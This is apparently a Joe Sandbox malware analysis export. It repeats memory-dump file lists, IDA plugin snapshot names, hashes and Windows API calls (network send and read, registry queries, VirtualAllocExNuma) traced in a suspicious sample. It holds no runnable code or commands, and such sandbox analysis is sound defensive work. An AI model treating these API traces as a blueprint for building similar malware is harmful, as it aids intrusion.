                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: HttpOpenRequest
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1984915467-0
                                                                                                                                                                        • Opcode ID: 8f6dda6248924234d635e8af3b8c181ff6bf969b703edfd6b0a7f0db1fa3578d
                                                                                                                                                                        • Instruction ID: 0af835e9f8e3946d32fd0ef1b78fc67e35d36830793c2c2ee6dfd7f41c6e8ac0
                                                                                                                                                                        • Opcode Fuzzy Hash: 8f6dda6248924234d635e8af3b8c181ff6bf969b703edfd6b0a7f0db1fa3578d
                                                                                                                                                                        • Instruction Fuzzy Hash: 34F01C757041499FCB15AB14ED98E13B7BBFBC830170585ACE9288B320EAB0A942DB45
                                                                                                                                                                        APIs
                                                                                                                                                                        • send.WS2_32(?,00000000,00000000,00000000), ref: 0041B707
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: send
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2809346765-0
                                                                                                                                                                        • Opcode ID: f891180c816c2ce714b9b94be52c5b0d5947f96de4b7c6887099c7d46b47550f
                                                                                                                                                                        • Instruction ID: a9a3b0816d14000c3ea72ae61eb84972967901e2d067d1671ff0420ce4462990
                                                                                                                                                                        • Opcode Fuzzy Hash: f891180c816c2ce714b9b94be52c5b0d5947f96de4b7c6887099c7d46b47550f
                                                                                                                                                                        • Instruction Fuzzy Hash: D1E092B1304204DFD764EB6CDC80B1A33D5ABC8314F040524F625C33E2D6E4AD424B4A
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                        • Opcode ID: 7cd4fe6ad6e59909534d91c24e1231c664b18193987a7460f1173d709761769e
                                                                                                                                                                        • Instruction ID: eaab9e8a9426e774b26bb2b696fb2d154981afcd4da67c9ca37f8eab44f15547
                                                                                                                                                                        • Opcode Fuzzy Hash: 7cd4fe6ad6e59909534d91c24e1231c664b18193987a7460f1173d709761769e
                                                                                                                                                                        • Instruction Fuzzy Hash: ECF082369057148BC300FF6CDD48A5A7BE1AB85368F14462CDCA0973D2FA709A85C786
                                                                                                                                                                        APIs
                                                                                                                                                                        • InternetReadFile.WININET(?,?,00001000), ref: 0041A8B9
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileInternetRead
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 778332206-0
                                                                                                                                                                        • Opcode ID: 70473b9776f8fbec2df8be3835985cf797b0dcf06161b76048af219404e4a476
                                                                                                                                                                        • Instruction ID: 3f3af098fb4036b25e042372a9c0b8040bf2feed6365c7899ef2e352af89c852
                                                                                                                                                                        • Opcode Fuzzy Hash: 70473b9776f8fbec2df8be3835985cf797b0dcf06161b76048af219404e4a476
                                                                                                                                                                        • Instruction Fuzzy Hash: 62E03031201215ABC30CDB19CD50D5A77E9AF94314B05001CF40697351EA70EC10CF49
                                                                                                                                                                        APIs
                                                                                                                                                                        • PathFileExistsA.SHLWAPI(00000000), ref: 0041DFA1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ExistsFilePath
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1174141254-0
                                                                                                                                                                        • Opcode ID: a81f6edcda9519f68eb628312b780929b02d8d025e6258539249c268bfd20d16
                                                                                                                                                                        • Instruction ID: d76b79a6710608f41cc938a5665811dd89a91e65a213db72b95ff70d70da261f
                                                                                                                                                                        • Opcode Fuzzy Hash: a81f6edcda9519f68eb628312b780929b02d8d025e6258539249c268bfd20d16
                                                                                                                                                                        • Instruction Fuzzy Hash: 66E01A767051129FCB08DF7CECF09A933B4AB086043080068D516E7671EA64EA15CB59
                                                                                                                                                                        APIs
                                                                                                                                                                        • InternetReadFile.WININET(?,?,00001000), ref: 0041A8B9
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileInternetRead
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 778332206-0
                                                                                                                                                                        • Opcode ID: 98163165d41a6265e4b1349cfaa7fc5f053c76245e1aec657650d1bb14249df3
                                                                                                                                                                        • Instruction ID: e48a13207e34c3cc3c155c8e222b5e783370ab62e081e48ae71adaea79e1e225
                                                                                                                                                                        • Opcode Fuzzy Hash: 98163165d41a6265e4b1349cfaa7fc5f053c76245e1aec657650d1bb14249df3
                                                                                                                                                                        • Instruction Fuzzy Hash: 0EE09271201505BFC30CEB59CD50DAA3BE9AF58350700001CF007C7360EAA09810CB4A
                                                                                                                                                                        APIs
                                                                                                                                                                        • RegQueryValueExA.KERNEL32(?,0066C369,00000000,?,?), ref: 00431FC7
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: QueryValue
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3660427363-0
                                                                                                                                                                        • Opcode ID: 6bbd52ad4ae57a3e5a9afa46785a769f00f41fd1592a8920a0533973d327d0dd
                                                                                                                                                                        • Instruction ID: 121ede9e79b0c66b4d45e5d0b271e0c9a442427d309f9241aea8ba78e68c4315
                                                                                                                                                                        • Opcode Fuzzy Hash: 6bbd52ad4ae57a3e5a9afa46785a769f00f41fd1592a8920a0533973d327d0dd
                                                                                                                                                                        • Instruction Fuzzy Hash: F8F03931305240AFD741CF24CC54F2A7FA5EB89728F01496CEA409B270D2B198458F99
                                                                                                                                                                        APIs
                                                                                                                                                                        • VirtualAllocExNuma.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0043E8BB), ref: 004010F7
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocNumaVirtual
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4233825816-0
                                                                                                                                                                        • Opcode ID: bb8c22882e4e6801e3f93027a8384a536ab1f92f41c5be2d295d4875465a3d3e
                                                                                                                                                                        • Instruction ID: d15b9f596ca57768b7915b5c70adcfe063bff0d2da7a8f47b6d44be3499abacb
                                                                                                                                                                        • Opcode Fuzzy Hash: bb8c22882e4e6801e3f93027a8384a536ab1f92f41c5be2d295d4875465a3d3e
                                                                                                                                                                        • Instruction Fuzzy Hash: 2FE09275A063508FD704FF7CDD8175933E0AF85605F05915CD884A7366EB30A99487C5
                                                                                                                                                                        APIs
                                                                                                                                                                        • K32GetModuleFileNameExA.KERNEL32(?,00000000,?,00000104), ref: 004340E0
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
